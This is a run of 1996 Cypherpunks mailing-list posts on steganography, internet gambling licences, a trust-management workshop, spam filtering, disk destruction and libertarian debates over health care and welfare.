Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From unicorn at schloss.li Tue Sep 17 15:02:44 1996 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 18 Sep 1996 06:02:44 +0800 Subject: no internet gambling In-Reply-To: Message-ID: On Tue, 17 Sep 1996, [ISO-8859-1] J�ri Kaljundi wrote: > > From todays Baltic News Service newswire (my free translation): > > According to the ministry of finance of Estonia, they will not give any > licences or permission to organize Internet gambling or lotteries in > Estonia. > > The reason given was, that arranging lotteries on the Internet would take > the activity outside from Estonia. According to the news, the only > Internet gambling licences given out are in Liechtenstein and Ahvenamaa > (part of Finland). > > My question is: how easy it is to get a licence for Internet casino in > either Liechtenstein Tere. Rather difficult. > or some off-shore country (Belize, Bahamas etc) ? I'm not sure about these others. > J�ri Kaljundi > AS Stallion > jk at stallion.ee -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From Adamsc at io-online.com Tue Sep 17 15:11:45 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 06:11:45 +0800 Subject: really undetectable crypto Message-ID: <19960917174627828.AAA205@IO-ONLINE.COM> On Thu, 12 Sep 96 19:26:56 -0700, Jim Miller wrote: >Most everybody on the list is familiar with the technique of hiding >encrypted messages in the LSBs of image files. Personally, I would not >use such a technique because don't I believe it's really undetectable. I >assume, without proof, that the LSBs of images files have statistical >properties that are sufficiently different from encrypted data that a >clever person could determine whether or not an image file contained an >imbedded encrypted message. Actually, if you use only a few bits - and not, say, bit 15 of *every* pixel - you can feel secure *IF* you are writing truly encrypted data. A regular PGP message has a bunch of header material that most certainly is not random-looking. OTOH, if you only write the raw data, then there is no way to differentiate from the random noise added by any scanner - in most cases, the last couple bits in each RGB triplet of a truecolor image are random. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From mab at research.att.com Tue Sep 17 15:18:32 1996 From: mab at research.att.com (Matt Blaze) Date: Wed, 18 Sep 1996 06:18:32 +0800 Subject: DIMACS Trust management workshop, Sept 30 - Oct 2. Message-ID: <199609171605.MAA24438@nsa.research.att.com> ------- Forwarded Message Received: from amontillado.research.att.com (amontillado.research.att.com [135.205.42.32]) by nsa.research.att.com (8.7.3/8.7.3) with ESMTP id LAA24206 for ; Tue, 17 Sep 1996 11:52:51 -0400 (EDT) Received: from research.research.att.com (research.research.att.com [135.205.32.20]) by amontillado.research.att.com (8.7.5/8.7) with SMTP id LAA14378 for ; Tue, 17 Sep 1996 11:52:30 -0400 (EDT) Received: from ns.research.att.com by research; Tue Sep 17 11:48:17 EDT 1996 Received: from henson.rutgers.edu by ns; Tue Sep 17 11:06:01 EDT 1996 Received: (from bquigley at localhost) by henson.rutgers.edu (8.6.12+bestmx+oldruq+newsunq+grosshack/8.6.12) id LAA26298; Tue, 17 Sep 1996 11:02:41 -0400 Date: Tue, 17 Sep 1996 11:02:41 -0400 From: Barbara Quigley Message-Id: <199609171502.LAA26298 at henson.rutgers.edu> To: dimacs-members at dimacs.rutgers.edu, local-list at dimacs.rutgers.edu, dimacs-dimacs at dimacs.rutgers.edu, dimacs-current-postdocs-industry at dimacs.rutgers.edu, dimacs-current-postdocs-univ at dimacs.rutgers.edu, dimacs-current-visitors at dimacs.rutgers.edu, rutgers-list at dimacs.rutgers.edu, theorynt at vm1.nodak.edu, finite-model-theory at informatik.rwth-aachen.de Subject: DIMACS Workshop on Trust Management in Networks, Rutgers University, September 30 - October 2, 1996 DIMACS Workshop on Trust Management in Networks September 30 - October 2, 1996 DIMACS, Rutgers University - ---------------------------------------------------------------------------- Organizers: Ernie Brickell brickell at btec.com Joan Feigenbaum jf at research.att.com David Maher dpm at allegra.att.com Theme: The use of public-key cryptography on a mass-market scale requires sophisticated mechanisms for managing trust. For example, any application that receives a signed request for action is forced to answer the central question ``Is the key used to sign this request authorized to take this action?'' In certain applications, this question reduces to ``Does this key belong to this person?'' In others, the authorization question is considerably more complicated, and resolving it requires techniques for formulating security policies and security credentials, determining whether particular sets of credentials satisfy the relevant policies, and deferring trust to third parties. This workshop covers all aspects of the trust management problem. Relevant topics include but are not limited to: * General approaches to trust management * Languages, systems, and tools * Certificates and public-key infrastructure * Formal models and analysis * Trust management in specific application domains; including but not limited to: o Banking o E-mail o Internet commerce o Licensing o Medical information systems o Mobile programs and ``code signing'' o Revocation of cryptographic keys For more information: Information about local arrangements, travel, lodging and registration can be found at http://dimacs.rutgers.edu/Workshops/Management. Those without WWW access can contact Pat Pravato at 908-445-5929 or pravato at dimacs.rutgers.edu. This workshop is part of DIMACS Special Year on Networks. Information about the Special Year on Networks can be found at DIMACS WWW site: http://dimacs.rutgers.edu or by contacting the center. __________________ Program: Monday, September 30, 1996 8:15 Continental breakfast 9:00 Welcome to DIMACS Fred Roberts, DIMACS Director 9:15 What is "Trust Management," and what are the Workshop Goals? Joan Feigenbaum, AT&T Laboratories 9:45 Let a Thousand (Ten Thousand?) CAs Reign Stephen Kent, BBN Corporation 10:45 Break 11:00 The PolicyMaker Approach to Trust Management Matt Blaze, AT&T Laboratories (Joint work with J. Feigenbaum and J. Lacy) 12:00 Lunch 1:15 SDSI: A Simple Distributed Security Infrastructure Butler Lampson, Microsoft (Joint work with R. Rivest) 2:15 SPKI Certificates Carl Ellison, Cybercash 3:15 Break 3:45 Panel Discussion Moderator: David Maher, AT&T Laboratories Panelists: Blaze, Ellison, Kent, and Lampson 5:30 Wine and cheese Tuesday, October 1, 1996 8:15 Continental Breakfast 9:00 Using PICS Labels for Trust Management Rohit Khare, World Wide Web Consortium 9:30 Managing Trust in an Information-Labeling System Martin Strauss, Iowa State University (Joint work with M. Blaze, J. Feigenbaum, and P. Resnick) 10:00 Trust Management in Web Browsers, Present and Future Ed Felten, Princeton University (Joint work with D. Dean and D. Wallach) 10:30 Break 10:45 IBM Cryptolopes, SuperDistribution, and Digital Rights Management Marc A. Kaplan, IBM Watson Research Center 11:15 Requirements and Approaches for Electronic Licenses David Maher, AT&T Laboratories 11:45 PathServer Michael Reiter, AT&T Laboratories (Joint work with S. Stubblebine) 12:15 Lunch 1:30 Inferno Security David Presotto, Bell Labs -- Lucent Technologies 2:00 Transparent Internet E-mail Security Raph Levien, University of Calfornia at Berkeley (Joint work with L. McCarthy and M. Blaze) 2:30 Secure Digital Names Stuart Haber, Bellcore (Joint work with S. Stornetta) 3:00 Break 3:30 Untrusted Third Parties: Key Management for the Prudent Mark Lomas, Cambridge University (Joint work with B. Crispo) 4:00 Distributed Trust Management using Databases Trevor Jim, University of Pennsylvania (Joint work with C. Gunter) 4:30 Distributed Commerce Transactions: Structuring Multi-Party Exchanges into Pair-wise Exchanges Steven Ketchpel, Stanford University (Joint work with H. Garcia-Molina) Wednesday, October 2, 1996 8:15 Continental Breakfast 9:00 Policy-Controlled Cryptographic Key Release David McGrew, Trusted Information Systems, Inc. (Joint work with D. Branstad) 9:45 An X.509v3-based Public-Key Infrastructure for the Federal Government William Burr, Nat'l. Inst. of Standards and Technology 10:15 Break 10:30 The ICE-TEL Public-Key Infrastructure and Trust Model David Chadwick, Salford University 11:00 A Distributed Trust Model Alfarez Abdul-Rahman, University College, London (Joint work with S. Hailes) 11:30 On Multiple Statements from Trust Sources Raphael Yahalom, Hebrew University and MIT 12:00 Lunch 1:00 Off-line Delegation in a Distributed File Repository Arne Helme, University of Twente (Joint work with T. Stabell-Kul) 1:30 Operational Tradeoffs of Aggregating Attributes in Digital Certificates Ian Simpson, Carnegie Mellon University 2:00 Trust Management for Mobile Agents Vipin Swarup, Mitre (Joint work with W. Farmer and J. Guttman) 2:30 Break 3:00 Trust Management in ERLink Samuel Schaen, Mitre 3:30 Linking Trust with Network Reliability Y. Desmedt, University of Wisconsin at Milwaukee (Joint work with M. Burmester) 4:00 Trust Management Under Law-Governed Interaction Naftaly Minsky, Rutgers University (Joint work with V. Ungureanu) 4:30 Tools for Security Policy Definition and Implementation Polar Humenn, Blackwatch Technology, Inc. ------- End of Forwarded Message From unicorn at schloss.li Tue Sep 17 15:20:17 1996 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 18 Sep 1996 06:20:17 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Politica... In-Reply-To: <9608178429.AA842985398@smtplink.alis.ca> Message-ID: On Tue, 17 Sep 1996 jbugden at smtplink.alis.ca wrote: > Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Political rant) > > Black Unicorn > >On Mon, 16 Sep 1996 jbugden at smtplink.alis.ca wrote: > >> Specifically, that anyone can "save for a rainy day" and still not be > >> able to provide for events that can always happen: Heart attack, > >> stroke, car accident, pinched nerve that leaves you in excruciating > >> pain and unable to work for several years. > > > >Understand what it is you are saying. > > > >You are saying that everyone on the planet has a right to health > > insurance and disability insurance whether they can afford it or not. > > This is folly. The result is serious moral hazard problems. > > Almost, but not quite. I'm saying that within our two countries at least > (Canada, U.S.) everyone could have access to medically necessary procedures > because the *society as a whole* can afford it. Your statement above is a loaded gun. The decisions about what is or is not medically necessary must by design be made by government in a socialized medicine regime. If I need to get in to why, it is because you don't understand socialized medicine as well as you think you do. As for society as a whole being able to afford it, that's hogwash unless you permit serious restrictions on the definition of "medically necessary." This evades an important point as well. Namely, who cares if society can afford it? Should it have to? Why is Joe Cracksmoker's fifteenth CBC blood test a bill that the taxpayer must pick up? Since when is every citizen on the planet entitled to free health insurance? > I understand moral hazard and risk pool seperation. I also understand that the > insurance bureacracy required to manage much of the U.S. health care system > absorbs much of the money going into the system. Managing risk pool seperation > proves to be expensive, or perhaps just very profitable. Of course it's profitable. Health care is not PBS. There is a price to be paid for getting someone else to promise to pay your bills if you get sick. To have it otherwise is to have a free lunch. There is no such thing. The reality is that socialized medicine, in every example I can think of, is merely low end health care. Anyone who can afford it opts out of the program and seeks the better quality and shorter lines within the private health care system. (Often in another country). > > Social safety nets prevent rioting by the lower classes, revolution and > > general civil disorder because they appease the masses. Indeed this > > is a form of health and life insurance for the middle and upper classes. > > Absolutely. And it is a scheme that many of the lower classes pay into. Since it > is to our mutual benefit (yours and mine), I choose not complain about it. I'm not going to complain about it so long as you don't put me in a position where I am asked to pay for every nerotic and friendless patient who calls the ambulance on a lonely night for company. (A friend of mine once worked EMS Boston, by his estimate his ambulance alone ran up about $7500 a month visiting ten or eleven such individuals. They'd get a call for a heart attack or somesuch and then some sweet old lady would invite them up for coffee). > > Spreading the risk, by itself, does NOT reduce cost. > > You must properly PRICE risk. > > Agreed. But there is a balance between accurately pricing the risk and > minimizing the cost of the bureacracy that polices this pricing. Oh, I see. Let's give the program to the government then. Good idea. That will reduce the cost of the bureacracy. > There are also many ways to modify behaviour, not all of them direct. We only > need a correlation here, not causation. For example, high taxes on smoking and > drinking or spot checks for drunk driving. All of these correlate with a > reduction in high risk behaviour and a reduction in health costs. And all of them buy into the notion that people are not to be made personally responsible for their high risk behavior. Instead, according to these solutions, it is the role of government to identify it, and discourage it. I prefer market solutions. > There is much potential for moral hazard when the PRICE for your insurance is > affected by the accuracy of your disclosure. How will they ever know... > > Fact: Canada spends less than the U.S. per capita on health care, while > covering more people in percentage terms. Fact: I would sever my own festering leg before I would check into a Canadian hospital. > And he brought the present unto Eglon king of Moab: and Eglon was a > very fat man. [Judges 3:17] > > "Of all tyrannies a tyranny sincerely exercised for the good of its victims > may be the most oppressive. It may be better to live under robber barons > than under omnipotent moral busybodies. The robber baron's cruelty may > sometimes sleep, his cupidity may at some point be satiated; but those who > torment us for own good will torment us without end, for they do so with > the approval of their own conscience." - C.S. Lewis, _God in the Dock_ It seems C.S. Lewis agrees with me on this point too. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From Adamsc at io-online.com Tue Sep 17 15:26:13 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 06:26:13 +0800 Subject: (fwd) Email Robot draws fire from CypherPunkz Message-ID: <19960917180810718.AAA222@IO-ONLINE.COM> On Fri, 13 Sep 1996 09:02:19 -0700 (PDT), Declan McCullagh wrote: >The Cypherpunks gang has apparently attacked a San Francisco artist's ^^^^ No wonder the Feds want to close us down. Look at all the dangerous things we've done this week: 1. Shot the bull 2. (see #1) 3. (see #1) et cetra # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From Adamsc at io-online.com Tue Sep 17 15:28:27 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 06:28:27 +0800 Subject: Fear of Flying -- from HotWired Message-ID: <19960917173431968.AAA223@IO-ONLINE.COM> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: >>... former CIA director James Woolsey: responded with some seemingly >> gratuitous anti-Net >> rhetoric. Terrorists may use biological weapons like anthrax, he said. >> "Anthrax is colorless, odorless, and has a 90 percent lethality. One >> gram has 100 million lethal doses." Then Woolsey delivered the zinger: >> "The knowledge of how to make anthrax is widely available, including >> on the Internet." >Gee, biotech has come a long way. Now I can download the Anthrax DNA >sequence from the net and insert it in some carrier bacteria and start >making Anthrax bacteria. Neat! Now the bad news: the DNA replicator only works under Windows 95 and comes with buggy drivers! >Or did he mean I can chemically synthesize Anthrax toxin? Or did he mean I >can get information on culturing bacteria on the net, but must obtain a >sample of the bacteria from other sources? I guess we need to ban all those "science" pages; after all, why would any non-terrorist want to learn about bacteria? >BTW - My dictionary says that Anthrax is primarily an animal disease which >only occasionally infects humans. It sounds like a poor choice for bio-war >terror. Unfortunately, it can be very deadly. The idea here is that it rarely infects humans - in the normal course of events. If a determined biowarrior is trying to infect people, all bets are off. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From wombat at mcfeely.bsfs.org Tue Sep 17 15:33:35 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Wed, 18 Sep 1996 06:33:35 +0800 Subject: Spam blacklist project In-Reply-To: <7aLDuD77w165w@bwalk.dm.com> Message-ID: > You haven't answered my question, Lues. If the list of e-mail addresses of > people who DON'T want junk e-mail is made available for _free for FTP, > together with a tool for spammers to scrub their mailing lists of these > addresses, and an easy way for anyone to add his or her address to this > list for _free, then how would Slaton _sell this list to anyone? > Easily. What percentage of, er, mass internet advertisers would know that this site exists? I assume it would become a very large list, and would make a very atractive target for someone who wanted to provide email addresses to others for a fee. btw - my girlfriend just wandered by, and read this over my shoulder. She's the network operations center mgr. for a large ISP. She just got a complaint last night from a, er, Internet Direct Mail Marketer, who claimed that his outbound mail queue was filling up, and this was somehow the ISP's fault that he couldn't reach certain addresses on a list he had recently purchased. Sorta like calling the phone company and complaining that some numbers on a telemarketing list were disconnected, or that nobody answered :) I'd say it's a safe bet that the unscrupulous could easily sell a large, up-to-date list of email addresses of people who DON'T want junk email to people who want to send such mail. - r.w. From ericm at lne.com Tue Sep 17 15:33:56 1996 From: ericm at lne.com (Eric Murray) Date: Wed, 18 Sep 1996 06:33:56 +0800 Subject: 56 kbps modems In-Reply-To: <199609170721.AAA22844@dfw-ix12.ix.netcom.com> Message-ID: <199609171741.KAA19827@slack.lne.com> Bill Stewart writes: > > >On Mon, 16 Sep 1996, Jay Gairson wrote: > >> Speaking of ISDN, how many people, can afford to have a personal ISDN > >> line in there house? And then afford to connect to something/someone > >> else on a next to permanent basis monthly? > > It's Phone Company Dependent. Here in Pac Bell territory, > an ISDN phone line costs about 2.5 analog phone lines, > and gets you two phone lines plus some signalling. > Connection costs are free at night, and 1 cent/minute daytime. > That may change - the phone company is appalled that all these > computer people interpret the phrase "free at night" as meaning > "it's _free_ at night", so their holding time predictions were bogus :-) > Night is defined as 7pm-7am for ISDN. ISDN-equipped ISPs start at > about $30/month; don't know if that's unlimited connect time or not. It's not. We wanted a 24/7 connection, with ISDN in PacBellLand that's ~$120/month for the ISDN (Centrex) and about $300/month for an ISP to route packets. Regular ISDN (not Centrex) would be even more expensive, and to do Centrex your ISP has to be in the same CO. The one ISP that was in out CO seemed pretty clueless. Pac Bell doesn't seem to want us to use ISDN. We wound up doing Frame Relay instead. We pay about the same to PacBell but less to the ISP. In addition, since it's a Business Service, Pac Bell is pretty serious about fixing it when it breaks- none of this "we'll check it out in a day or two" like with POTS, they put a tech on it right away. As far as affording it goes, since our offices are at "home" it's just another cost of doing business. Crypto/security related: how hard is it to hack a Frame Relay connection? My impression is that it requires access to one of the telco's routing computers, which would make it about equivalent in difficulty to hacking POTS. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From Adamsc at io-online.com Tue Sep 17 15:36:53 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 06:36:53 +0800 Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW Message-ID: <19960917181556953.AAA214@IO-ONLINE.COM> On Fri, 13 Sep 1996 11:33:09 -0700, stewarts at ix.netcom.com wrote: >Anybody for an Internet Driver's License? *Surfer's* license. The newsies love to refer to "net surfing", because to the highly unknowledgable reader it makes it sound as if they have a clue about what they're writing on. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From Adamsc at io-online.com Tue Sep 17 15:48:22 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 06:48:22 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net Message-ID: <19960917180459734.AAA72@IO-ONLINE.COM> On Fri, 13 Sep 1996 07:47:27 -0700 (PDT), Z.B. wrote: >> At 09:24 PM 9/12/96 -0700, zachb at netcom.com wrote: >> >> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales >> >> of material considered "harmful to minors" from vending machines.) >> > >> >Even if this statute is meant only to apply to cigarette machines, which >> >would seem to be the case given all of the anti-cig stuff going on now, >> >what good will it do? >> >> Whoops. Sorry. Wrong context. What I should have said was "the 9th Circuit >> upheld a CA statute forbidding sales of *printed* material considered >> 'harmful to minors' from unsupervised vending machines". The publication(s) >It's still mostly the same thing. I've never seen the type of machine >that you're talking about, and I don't think anyone would be dumb enough >to install one in a store that is near a school, or frequented my >minors. This law just does not seem like a very good idea. Where did you live? I used to walk home from school (in Ventura, CA - about 1 hour away from LA) and see a vending machine selling copies of "LA X-Press" (Or something like that) right next to the vending machines for the Star-Free Press and the LA Times. This was on the curb by a busy shopping center, on the block opposite of the County of Ventura's government center. Hypothetically, it was even plausibly deniable (the watchword of the Clintons) - "I was just buying this copy of the newspaper." And before someone asks, no, I wasn't buying them. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From Adamsc at io-online.com Tue Sep 17 15:51:03 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 06:51:03 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <19960917185652765.AAA210@IO-ONLINE.COM> On Sat, 14 Sep 1996 21:08:58 +0200 (METDST), Asgaard wrote: >>The 70% already _are_ cutting the throats of the other 30%. It's called a >>60%+ tax rate. This is the sum of: federal income tax, state income tax, >Most of these taxes are not used for feeding the poor but to support >the Nomenclatura of the Bureaucracy and we all want to get rid of that. Quite true; I'd love to see the government run as a business, where some departments might run out of money 6 months early if they aren't careful. It'd be hard at first, but they'd have to change to survive... >standalone women to make babies to get benefits was very bad. The >Chinese system - less benefits the more children you have - is the >way to go. ++agree (Orwell also contributed other conventions. . .) >>(The point being that people want more than "basic food and shelter," but >>are often unwilling to make the commitments and sacrifices in their lives >>to gain the wherewithal to earn significant salaries.) >This is where we disagree. The real lazy ones are satisfied with a roof >over there heads, a microwave oven for cooking pizza, a six-pack and >a soap opera. Most people really do want to achieve something more in >their lives. How many of them are willing to go pick grapes for below minimum wage, since they've carefully avoided learning anything remotely useful? We have a ton of illegal immigrants who are quite willing to do so. The market is there, so why aren't they working? >>There is a basic error here, one that I see often. Who says that the >>"anarcho-capitalists" will freely give away, say, some vast fraction of >>their profits so as to subsidize the overall society? Any more so than the >Not a vast portion, if the above_basics capitalistic economy blooms. >Probably 10% would suffice - what was once paid to the church, the >institution that traditionally has supported the ill and poor. traditionally *raped* the ill and poor. Nothing wrong with true charity, but do you really think all the gold and art that (for instance) the Vatican acquired, much of it during the dark ages, was from giving contributions to the poor? Most of the time, they were the problem: "Give us money to buy absolution or your loved ones will rot in Hell forever!" # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From Adamsc at io-online.com Tue Sep 17 16:02:43 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 07:02:43 +0800 Subject: Erasing Disks Message-ID: <19960917191232859.AAA212@IO-ONLINE.COM> On Sat, 14 Sep 1996 20:11:45 -0500 (CDT), Douglas R. Floyd wrote: >> >But shredding the floppy? No need to classify that, no secrets leaked >> Burn after shredding, or you have a puzzle fan reassembling the shredded disk. >Actually, taking the cookie portion out, putting it on an inverted cup so >its in the center of the microwave, then letting it cook for 30 seconds >does the job quite well =) I've always been a fan of applying lighter fluid in a fashion similar to the way the allies applied napalm to Dresden. It's more satisfying... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From frissell at panix.com Tue Sep 17 16:07:19 1996 From: frissell at panix.com (Duncan Frissell) Date: Wed, 18 Sep 1996 07:07:19 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <3.0b19.32.19960917142515.00a05cf0@panix.com> At 10:18 AM 9/16/96 EST, jbugden at smtplink.alis.ca wrote: >Two questions, two observations: >Do you have health insurance? >Do you have life insurance? > >I have commented on your line of reasoning before and and it still seems to me >that an important part of the discussion is missed. Specifically, that anyone >can "save for a rainy day" and still not be able to provide for events that can >always happen: Heart attack, stroke, car accident, pinched nerve that leaves you >in excruciating pain and unable to work for several years. However, one can also prepare in the traditional way by having friends and family. If you have same, you will always have enough to eat and someone to take care of you (and also to kick you in the ass when you need it. >I don't think that a reasonable person would argue that medical insurance should >be outlawed because everyone should take care of their own needs. A social >safety net is simply a form of health and life insurance. Statistical arbitrage >if you will. By spreading the risk you minimize the cost. Somewhat actuarily unsound however. If "the welfare" or SS were private charities or insurance schemes, their management would be in prison for self-dealing and fraud because of the high overhead of welfare and the Ponzi scheme nature of SS. Note too the recent article in the Economist about how European firms are raising capital in the UK and the US because it is available there in private pension savings while European government retirement systems suck loads of capital out of the system leaving nothing but massive government debts. DCF From Adamsc at io-online.com Tue Sep 17 16:31:03 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 07:31:03 +0800 Subject: SPL -- Suspicious Persons List Message-ID: <19960917190833984.AAA75@IO-ONLINE.COM> On Sat, 14 Sep 96 17:36:49 EDT, Dr.Dimitri Vulis KOTM wrote: >> unjust if the company was bought out and the new owner decided to sack >> all black people and people called "Perry". You were the one who brought >> up the issue of fairness. >The owner should be able to do that without interference from any gubment. Yes. If they manage to survive economically while snubbing a productive chunk of the general population in addition to a loon, good for them. If their product still sells, inspite of negative publicity it's probably the market leader. OTOH, I think there should be some basic safeguards against the formation of 'company towns' or similar constructs. A free market is rarely a given. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From JMKELSEY at delphi.com Tue Sep 17 16:32:32 1996 From: JMKELSEY at delphi.com (JMKELSEY at delphi.com) Date: Wed, 18 Sep 1996 07:32:32 +0800 Subject: Dealing with junk mail Message-ID: <01I9L7W8DYNA8ZO0TR@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- [ To: cypherpunks ## 09/17/96 09:26 am ## Subject: Dealing with junk mail ] There has been a bunch of stuff in the news lately about junk e-mail, including the recent judge's ruling that AOL must allow known junk-mail through to its subscribers while the judge hears arguments from AOL and the junk-mailers. I'm a little divided on the whole issue of whether or not it's wise policy for ISPs to, in general, refuse to deliver suspected junk mail. The obvious problem is that it puts ISPs in the position of deciding whether or not some piece of e-mail is worthwhile. (To clarify, I certainly *don't* think that ISPs should be prohibited by law from blocking delivery of or access to anything they choose to--there are plenty of ISPs to choose from, and users can move if they don't like their current ISPs' policies. I just don't think I'd like Delphi to start filtering my e-mail without asking me for permission and instructions first.) I've been thinking about an alternative approach to blocking commercial spam. It has some potential technical problems, but I think it could be made into a workable 95% or so filter. Many people are already filtering messages locally, and now some providers are getting into the act, as well. Unfortunately, because of the economics of junk e-mail, I think that this, by itself, will probably lead to people refusing to accept almost all e-mail from people they don't know. This is a really bad outcome. What I'm proposing is an extension to this, in which many peoples' filters coordinate their actions to detect and block spam. Each user has a mail filter with a set of rules written either by or for that user. The mail filter does one of four things with each piece of e-mail it receives: a. It lets the e-mail through immediately. (E-mail from friends, employers, employees, family members, etc. would probably be in this category.) b. It discards the e-mail immediately. (E-mail from people you really didn't like, and from people who have spammed you in the past would probably be in this category.) c. It puts the e-mail on hold in some storage area. d. Send e-mail back to the sender, informing him of conditions under which the user is willing to accept this e-mail. This might be things like requiring anonymous users to provide some minimal kind of identity, or telling senders ``I'll read your e-mail for one dollar in digicash,'' or ``I'll read your e-mail if you carry out this computationally expensive calculation, or some other thing. For e-mail in the third category, some kind of summary report is sometimes generated, to be sent to a server. The server collects these reports, and uses some kind of system (maybe rule-based, but probably involving scores to estimate probability of spam or other unwanted e-mail) to determine what is and is not spam, and with what probability. It then sends to each of its subscribers, every day or so, a report indicating scores for users' messages. (These should be individualized.) The mail filters then do one of four things to each piece of mail rated, based on the scores: a. Pass the message through immediately. b. Discard the message immediately. c. Add the message to a list of low-priority messages, to be read when the user has some spare time. d. Send e-mail back to the sender, informing him of conditions under which the user is willing to accept this e-mail. This might be things like requiring anonymous users to provide some minimal kind of identity, or telling senders ``I'll read your e-mail for one dollar in digicash,'' or ``I'll read your e-mail if you carry out this computationally expensive calculation, or some other thing. The junk e-mailers can try various countermeasures to this. The most obvious are: a. Try to hit people who aren't using a good junk-mail filter. b. Try to make it against the law to use a junk-mail filter. (Perhaps this would be the case only for PSA spams?) c. Try to disguise their e-mail to make it not obviously junk e-mail, and simultaneously to alter each message to avoid detection by the servers, by making changes to each message, timestamp, and claimed sender ID. I think (c) will be somewhat difficult for the junk e-mailers, if the people who run the servers are reasonably clever. The servers should run indexes that find many identical or similar sentences, paragraphs, etc, in messages sent to many people. I think either the junk e-mailers would give up on these filters immediately, or there would be an endless arms race between advertisers and filter servers. There are some potential problems with this approach, though. The servers will be getting a lot of information about what e-mail is coming to each of their users. There will be serious privacy concerns, especially if the filters work after decrypting public-key encrypted messages. (Note that if the user's public key is reasonably long, PK encrypting the message will actually be pretty hard for thousands or millions of messages at a time. Also, there will be various denial-of-service attacks, where I know Alice is getting ready to send Bob some e-mail I don't want him to get, so I intercept Alice's e-mail and forward it to 10,000 other people--thus ensuring that it will be classified as spam. Comments? Note: Please respond via e-mail as well as or instead of posting, as I get CP-LITE instead of the whole list. --John Kelsey, jmkelsey at delphi.com / kelsey at counterpane.com PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj7vzUHx57Ag8goBAQGUbgQAsP62f0HDO4L0cs3DjCh9ppX3IgQUX8l6 W4JtH3WPfaHrzftD4UMGZ3D41kCjvGht/s62dPtq4lzDbqSpSB81oh4RVuyEw/kD CZ4L0q2q6jFkTdnIp2mvP1WNlCTTpw2BBKY5U4tYCcthq8y30YmOGSqpKouK4l9S gCV3Nd6C/Ig= =Dent -----END PGP 